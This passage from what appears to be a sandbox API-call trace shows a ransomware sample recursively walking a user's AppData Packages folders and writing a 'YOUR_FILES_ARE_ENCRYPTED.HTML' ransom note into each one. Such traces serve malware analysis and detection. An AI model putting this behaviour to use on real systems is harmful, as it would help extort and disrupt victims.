lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97e6396b, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97e6396b, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x97e6396b, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5f6a, dwReserved1=0x6f5e98, cFileName="..", cAlternateFileName="")) returned 0 [0119.767] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0119.768] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 144 [0119.768] GetProcessHeap () returned 0x600000 [0119.768] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x30f4fc8 [0119.768] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.secondarytileexperience_cw5n1h2txyewy\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0119.769] WriteFile (in: hFile=0x320, lpBuffer=0x30f4fc8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x30f4fc8*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.771] CloseHandle (hObject=0x320) returned 1 [0119.771] GetProcessHeap () returned 0x600000 [0119.771] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.771] GetProcessHeap () returned 0x600000 [0119.771] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.771] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97e6396b, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97e6396b, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x97e6396b, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0119.771] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0119.771] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 134 [0119.771] GetProcessHeap () returned 0x600000 [0119.771] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314b010 [0119.771] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.secondarytileexperience_cw5n1h2txyewy\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0119.772] WriteFile (in: hFile=0x214, lpBuffer=0x314b010*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x314b010*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0119.774] CloseHandle (hObject=0x214) returned 1 [0119.774] GetProcessHeap () returned 0x600000 [0119.774] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.774] GetProcessHeap () returned 0x600000 [0119.774] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0119.775] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a0d549b, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5a147a84, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5a147a84, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy", cAlternateFileName="MICROS~1.SHE")) returned 1 [0119.775] StrStrIW (lpFirst="Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.775] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy") returned 100 [0119.775] GetProcessHeap () returned 0x600000 [0119.776] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0119.777] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy" [0119.777] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\*" [0119.777] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a0d549b, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5e3e36ea, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5e3e36ea, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0119.777] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a0d549b, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5e3e36ea, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5e3e36ea, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0119.777] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5a147a84, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6cb00b48, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6cb00b48, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0119.777] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.777] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC") returned 103 [0119.777] GetProcessHeap () returned 0x600000 [0119.777] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.778] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC" [0119.778] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\*" [0119.778] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5a147a84, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6cb00b48, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6cb00b48, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626638 [0119.779] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5a147a84, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6cb00b48, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6cb00b48, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0119.779] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5a147a84, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5a147a84, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5a147a84, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0119.779] StrStrIW (lpFirst="INetCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.779] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCache") returned 113 [0119.779] GetProcessHeap () returned 0x600000 [0119.779] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0119.781] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCache" [0119.781] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCache\\*" [0119.781] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5a147a84, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5a147a84, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5a147a84, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f64b8, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0119.782] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5a147a84, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5a147a84, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5a147a84, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f64b8, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0119.782] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5a147a84, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5a147a84, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5a147a84, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f64b8, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 0 [0119.782] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0119.782] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 143 [0119.782] GetProcessHeap () returned 0x600000 [0119.782] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3104fd0 [0119.783] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\ac\\inetcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0119.784] WriteFile (in: hFile=0x324, lpBuffer=0x3104fd0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3104fd0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0119.785] CloseHandle (hObject=0x324) returned 1 [0119.785] GetProcessHeap () returned 0x600000 [0119.785] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3104fd0 | out: hHeap=0x600000) returned 1 [0119.785] GetProcessHeap () returned 0x600000 [0119.785] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.786] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5a19402a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5a19402a, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5a19402a, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0119.786] StrStrIW (lpFirst="INetCookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.786] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCookies") returned 115 [0119.786] GetProcessHeap () returned 0x600000 [0119.786] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0119.786] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCookies" [0119.786] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCookies\\*" [0119.786] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCookies\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5a19402a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5a19402a, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5a19402a, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f64b8, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0119.786] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5a19402a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5a19402a, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5a19402a, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f64b8, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0119.786] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5a19402a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5a19402a, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5a19402a, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f64b8, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 0 [0119.786] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0119.786] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 145 [0119.786] GetProcessHeap () returned 0x600000 [0119.786] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3104fd0 [0119.787] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.shellexperiencehost_cw5n1h2txyewy\\ac\\inetcookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0119.787] WriteFile (in: hFile=0x324, lpBuffer=0x3104fd0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3104fd0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0119.789] CloseHandle (hObject=0x324) returned 1 [0119.789] GetProcessHeap () returned 0x600000 [0119.789] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3104fd0 | out: hHeap=0x600000) returned 1 [0119.789] GetProcessHeap () returned 0x600000 [0119.789] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.790] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5a147a84, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5a147a84, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5a147a84, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15a, dwReserved1=0x63d090, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0119.790] StrStrIW (lpFirst="INetHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.790] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetHistory") returned 115 [0119.790] GetProcessHeap () returned 0x600000 [0119.790] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0119.791] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetHistory" [0119.791] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetHistory\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetHistory\\*" [0119.791] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\\AC\\INetHistory\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5a147a84, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5a147a84, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5a147a84, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f64b8, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0119.791] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5a147a84, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5a147a84, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5a147a84, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f64b8, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0119.791] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5a147a84, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5a147a84, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5a147a84, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f64b8, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 0 [0119.791] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0119.791] wnsprintfW (in: pszDest=0x30f4fc8, 